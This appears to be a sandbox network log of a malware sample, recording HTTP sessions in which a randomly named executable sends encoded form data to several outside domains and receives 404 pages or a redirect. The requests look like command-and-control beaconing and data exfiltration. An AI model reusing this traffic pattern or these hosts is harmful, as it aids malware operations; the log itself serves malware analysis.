                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.4 | 63324 | 172.96.187.60 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:02.308949947 CEST | 498 | OUT | GET /v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.dalong.site
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:02.762028933 CEST | 1033 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:18:02 GMT
                                                      server: LiteSpeed
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.4 | 63325 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:07.814496994 CEST | 787 | OUT | POST /xamn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mgeducacaopro.online
                                                      Origin: http://www.mgeducacaopro.online
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mgeducacaopro.online/xamn/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=TKQUtJlMp/1FV5p5Db6M229HL9W7RSf+Afit8fQsnrzwV3dL20tBIoJk4k8musKSV9oytxoSNbSSmqzsnGq4vmF6R3A80I+wWXUgxdIoQJ6WVVl4a0w5BhIfoT4zOFNq6fc+BOTtvcvw9LGL+UEXI3fYmybBTeYE85nQPgNnt80BdHStceVeyTBR1xeDWQYo5A==


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      10 | 192.168.2.4 | 63326 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:10.359231949 CEST | 807 | OUT | POST /xamn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mgeducacaopro.online
                                                      Origin: http://www.mgeducacaopro.online
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mgeducacaopro.online/xamn/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3kffwUVFL3w5BJoJktU8nzcKnV9kMt0QSNYuSmrDsnVC7gWFkeXA65o+wWXUgxddgQJCWVlV4Llw+aBIc/j4zKFNx6fcYBPPHvenw9LWL+AYUG3fSrSaDbNlj8qeRFCYBw9gMRhD3Nv0JgTlio2X3bTlhiNwSjX1rum92cSYSI/WfuJ0=


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      11 | 192.168.2.4 | 63327 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:18:12.906126022 CEST | 10889 | OUT | POST /xamn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mgeducacaopro.online
                                                      Origin: http://www.mgeducacaopro.online
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mgeducacaopro.online/xamn/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 65 4c 77 56 67 5a 4c 32 58 46 42 62 59 4a 6b 73 55 38 36 7a 63 4b 36 56 39 73 41 74 30 4d 73 4e 64 71 53 6e 49 62 73 32 30 43 37 37 6d 46 6b 63 58 41 2f 30 49 2b 6c 57 58 6b 6b 78 64 4e 67 51 4a 43 57 56 6e 4e 34 62 45 77 2b 64 78 49 66 6f 54 34 42 4f 46 4d 2f 36 66 46 6a 42 50 62 39 76 50 48 77 38 76 4b 4c 38 7a 77 55 4b 33 66 63 34 69 61 68 62 4e 70 38 38 71 43 6e 46 48 6c 6b 77 39 55 4d 52 6e 4f 36 5a 50 67 70 30 41 35 51 36 33 7a 54 44 7a 74 74 75 76 38 58 74 33 5a 4f 35 31 46 35 54 6a 78 4f 4d 36 57 62 34 4f 73 46 58 71 76 5a 51 36 5a 78 31 61 54 2b 79 38 4e 33 46 74 4a 46 71 68 53 55 6c 67 79 51 69 44 4b 75 56 61 69 6e 63 70 42 34 55 45 74 44 4c 68 50 78 44 2b 49 68 46 6f 30 69 7a 76 6c 43 4c 37 52 61 64 41 42 37 49 4c 35 4a 47 46 57 49 37 64 58 4a 6a 6f 63 30 38 63 62 57 44 4c 54 41 41 76 71 34 69 6b 69 58 74 75 4c 42 54 43 32 4b 65 64 55 6d 52 69 63 57 74 [TRUNCATED]
                                                       Data Ascii: pP_8=[TRUNCATED]


                                                       Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 63328 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:15.461708069 CEST | Bytes transferred: 507 | Direction: OUT
                                                       GET /xamn/?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.mgeducacaopro.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Timestamp: Sep 11, 2024 11:18:15.905046940 CEST | Bytes transferred: 392 | Direction: IN
                                                       HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:18:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 50 5f 38 3d 65 49 34 30 75 2b 6b 58 6c 36 64 43 4e 4f 78 75 46 4b 62 43 69 67 52 31 4e 38 36 6d 45 67 66 4b 58 50 6e 41 32 6f 52 56 68 35 37 63 62 31 46 4f 79 77 35 61 63 4b 74 31 75 53 56 6b 72 74 4f 47 65 50 55 43 6e 6c 55 51 49 4a 53 37 6b 5a 6a 61 68 53 57 52 36 52 31 61 64 46 6f 70 75 63 57 44 45 32 68 61 36 2f 73 31 50 50 58 44 59 69 70 36 63 46 49 64 44 48 59 3d 26 56 30 51 68 3d 34 70 42 74 61 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8"}</script></head></html>


                                                       Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 63329 | Destination IP: 67.223.117.189 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:21.117927074 CEST | Bytes transferred: 763 | Direction: OUT
                                                       POST /fava/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.heldhold.xyz
                                                      Origin: http://www.heldhold.xyz
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.heldhold.xyz/fava/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 30 5a 50 59 48 74 39 58 66 65 4c 57 76 59 67 6e 62 51 70 47 34 43 52 46 53 73 39 76 56 39 51 56 46 6f 43 59 4c 41 78 41 6f 62 52 50 6e 6e 39 75 49 77 71 33 4a 77 37 66 44 42 32 4a 37 6b 4a 30 70 70 51 33 73 38 47 66 6a 51 50 6b 35 4f 64 4e 44 4f 4f 6a 57 4a 4b 6f 67 63 64 37 45 46 54 49 2f 74 51 64 5a 71 46 59 4b 77 36 78 7a 36 6e 47 50 4a 39 78 63 4f 32 66 76 51 71 58 74 2f 67 5a 76 67 78 71 43 53 73 45 44 44 2f 53 37 65 49 45 45 74 61 64 75 44 68 73 51 53 31 67 63 52 34 54 76 31 42 77 55 4c 67 42 37 6b 42 53 4f 66 4d 2f 5a 6c 4e 76 51 3d 3d
                                                      Data Ascii: pP_8=LAr5q9LyWuo5N0ZPYHt9XfeLWvYgnbQpG4CRFSs9vV9QVFoCYLAxAobRPnn9uIwq3Jw7fDB2J7kJ0ppQ3s8GfjQPk5OdNDOOjWJKogcd7EFTI/tQdZqFYKw6xz6nGPJ9xcO2fvQqXt/gZvgxqCSsEDD/S7eIEEtaduDhsQS1gcR4Tv1BwULgB7kBSOfM/ZlNvQ==
                                                       Timestamp: Sep 11, 2024 11:18:22.311043978 CEST | Bytes transferred: 1236 | Direction: IN
                                                       HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:21 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                       Timestamp: Sep 11, 2024 11:18:22.311181068 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                      Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
                                                       Timestamp: Sep 11, 2024 11:18:22.311203957 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                      Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
                                                       Timestamp: Sep 11, 2024 11:18:22.311219931 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 20 66 61 62 6c
                                                      Data Ascii: glish</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                       Timestamp: Sep 11, 2024 11:18:22.311234951 CEST | Bytes transferred: 896 | Direction: IN
                                                       Data Raw: 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62 6c 65 73 20 54 65 6d 70 6c 61 74 65 22 20 63
                                                      Data Ascii: ndex.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-con
                                                       Timestamp: Sep 11, 2024 11:18:22.311249018 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                       Timestamp: Sep 11, 2024 11:18:22.311264038 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                       Timestamp: Sep 11, 2024 11:18:22.311279058 CEST | Bytes transferred: 448 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                       Timestamp: Sep 11, 2024 11:18:22.311294079 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                       Timestamp: Sep 11, 2024 11:18:22.311309099 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
                                                       Timestamp: Sep 11, 2024 11:18:22.311325073 CEST | Bytes transferred: 1236 | Direction: IN
                                                       Data Raw: 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d
                                                      Data Ascii: nu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a> <ul class="dropdown-menu">
                                                       Timestamp: Sep 11, 2024 11:18:22.311614990 CEST | Bytes transferred: 1236 | Direction: IN
                                                       HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:21 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]


                                                       Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 63330 | Destination IP: 67.223.117.189 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:23.663914919 CEST | Bytes transferred: 783 | Direction: OUT
                                                       POST /fava/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.heldhold.xyz
                                                      Origin: http://www.heldhold.xyz
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.heldhold.xyz/fava/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 4e 51 56 6e 77 43 5a 50 55 78 42 6f 62 52 58 58 6e 38 6a 6f 77 74 33 4a 38 4a 66 43 39 32 4a 37 77 4a 30 70 5a 51 33 66 45 46 66 7a 51 4e 2f 4a 50 62 4a 44 4f 4f 6a 57 4a 4b 6f 67 59 6e 37 45 64 54 49 50 39 51 50 4e 2b 43 65 36 77 31 77 7a 36 6e 4c 76 4a 35 78 63 50 6a 66 72 51 45 58 76 33 67 5a 71 45 78 71 7a 53 76 4e 44 44 44 4e 72 66 69 4b 6c 51 44 62 38 4c 68 76 53 43 79 70 76 4e 2b 53 70 6b 62 68 6c 71 33 54 37 41 79 50 4a 57 34 79 61 59 45 30 54 43 2f 64 4a 51 73 46 59 6d 75 62 38 49 62 38 69 34 33 37 70 38 3d
                                                      Data Ascii: pP_8=LAr5q9LyWuo5NUpPUAZ9CveEcPYg+LQXG4GRFQB4sjNQVnwCZPUxBobRXXn8jowt3J8JfC92J7wJ0pZQ3fEFfzQN/JPbJDOOjWJKogYn7EdTIP9QPN+Ce6w1wz6nLvJ5xcPjfrQEXv3gZqExqzSvNDDDNrfiKlQDb8LhvSCypvN+Spkbhlq3T7AyPJW4yaYE0TC/dJQsFYmub8Ib8i437p8=
                                                       Timestamp: Sep 11, 2024 11:18:24.239707947 CEST | Bytes transferred: 1236 | Direction: IN
                                                       HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:24 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html
